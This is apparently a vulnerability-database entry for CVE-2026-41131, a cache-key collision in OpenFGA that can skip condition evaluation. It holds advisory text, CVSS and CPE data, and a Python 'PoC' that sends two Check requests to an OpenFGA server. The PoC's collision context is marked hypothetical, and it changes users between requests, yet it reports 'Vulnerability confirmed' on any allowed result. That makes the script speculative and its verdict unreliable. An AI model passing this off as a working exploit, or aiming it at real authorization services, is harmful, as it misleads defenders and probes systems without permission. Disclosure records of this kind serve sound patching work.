Security Vulnerability Report
CVE-2026-41131 CVSS 5.0 MEDIUM


Published: 2026-04-22 00:16:29
Last Modified: 2026-04-24 13:44:37

Description

OpenFGA is an authorization/permission engine built for developers. Prior to version 1.14.1, in specific scenarios, models using conditions with caching enabled can result in two different check requests producing the same cache key. This could result in OpenFGA reusing an earlier cached result for a subsequent request, so a check is answered from the cache instead of by evaluating the condition for the new request. The preconditions for the vulnerability are that the model has relations which rely on condition evaluation and that the deployment has caching enabled. OpenFGA v1.14.1 contains a fix.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:openfga:helm_charts:*:*:*:*:*:openfga:*:* - VULNERABLE (helm chart versions < 0.3.1)
cpe:2.3:a:openfga:openfga:*:*:*:*:*:*:*:* - VULNERABLE (OpenFGA < 1.14.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-41131 (OpenFGA Cache Key Collision)

This script demonstrates the concept where two different check requests
might result in a cache hit, bypassing condition evaluation.
"""
import requests

TARGET_URL = "http://localhost:8080"
STORE_ID = "target_store_id"
MODEL_ID = "target_model_id"


def make_request(user, obj, relation, context):
    """Send one Check request to the OpenFGA HTTP API and return the parsed JSON body."""
    endpoint = f"{TARGET_URL}/stores/{STORE_ID}/check"
    headers = {"Content-Type": "application/json"}
    payload = {
        "tuple_key": {"user": user, "object": obj, "relation": relation},
        "authorization_model_id": MODEL_ID,
        "context": context,
    }
    response = requests.post(endpoint, headers=headers, json=payload, timeout=10)
    return response.json()


# Step 1: Send a request with context that allows access.
# This result gets cached under a specific Key A.
print("[+] Sending request 1 with valid admin context...")
ctx_admin = {"level": "admin", "region": "us"}
resp1 = make_request("user:alice", "doc:1", "viewer", ctx_admin)
print(f"    Response: {resp1}")

# Step 2: Send a request with a different context (e.g., guest).
# Vulnerability: this generates the same Cache Key A, so the system
# returns the cached 'allowed' result instead of evaluating the guest context.
print("[+] Sending request 2 with guest context (triggering collision)...")
ctx_guest = {"level": "guest", "region": "eu"}  # Hypothetical collision context
resp2 = make_request("user:bob", "doc:1", "viewer", ctx_guest)
print(f"    Response: {resp2}")

if resp2.get("allowed") is True:
    print("[!] Vulnerability confirmed: guest access granted via cache poisoning.")
else:
    print("[-] Access denied correctly or target not vulnerable.")
```

References

https://github.com/openfga/openfga/releases/tag/v1.14.1 (Product, Release Notes)
https://github.com/openfga/openfga/security/advisories/GHSA-57j5-qwp2-vqp6 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41131", "sourceIdentifier": "[email protected]", "published": "2026-04-22T00:16:29.013", "lastModified": "2026-04-24T13:44:37.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenFGA is an authorization/permission engine built for developers. Prior to version 1.14.1, in specific scenarios, models using conditions with caching enabled can result in two different check requests producing the same cache key. This could result in OpenFGA reusing an earlier cached result for a subsequent request. The preconditions for vulnerability are the model having relations which rely on condition evaluation and the user having caching enabled. OpenFGA v1.14.1 contains a fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-706"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openfga:helm_charts:*:*:*:*:*:openfga:*:*", "versionEndExcluding": "0.3.1", "matchCriteriaId": "8E5C9CC5-31C7-4307-89E8-513DB9C4E1A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openfga:openfga:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.14.1", "matchCriteriaId": "AD90DCAE-2F12-4225-9B25-6DACB03F56C7"}]}]}], "references": [{"url": "https://github.com/openfga/openfga/releases/tag/v1.14.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": 
"https://github.com/openfga/openfga/security/advisories/GHSA-57j5-qwp2-vqp6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}